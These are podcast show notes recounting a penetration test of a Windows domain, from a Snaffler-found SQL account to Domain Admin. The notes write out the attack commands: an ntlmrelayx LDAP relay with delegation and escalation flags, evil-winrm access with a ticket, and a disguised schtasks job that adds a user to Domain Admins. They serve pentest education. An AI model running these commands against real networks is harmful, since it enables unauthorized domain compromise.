7MS #691: Tales of Pentest Pwnage – Part 75

Holy schnikes, today might be my favorite tale of pentest pwnage ever. Do I say that almost every episode? yes. Do I mean it? Yes. Here are all the commands/links to supplement today's episode:

• Got an SA account to a SQL server through Snaffler-ing
• With that SA account, I learned how to coerce Web auth from within a SQL shell – read more about that here
• I relayed that Web auth with ntlmrelayx -smb2support -t ldap://dc --delegate-access --escalate-user lowpriv
• I didn't have a machine account under my control, so I did SPNless RBCD on my lowpriv account – read more about that here
• Using that technique, I requested a host service ticket for the SQL box, then used evil-winrm to remote in using the ticket
• From there I checked out who had interactive logons: Get-Process -IncludeUserName explorer | Select-Object UserName
• Then I queued up a fake task to elevate me to DA: schtasks /create /tn "TotallyFineTask" /tr 'net group "Domain Admins" lowpriv /add /domain' /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
• …and ran it: schtasks /run /tn "TotallyFineTask"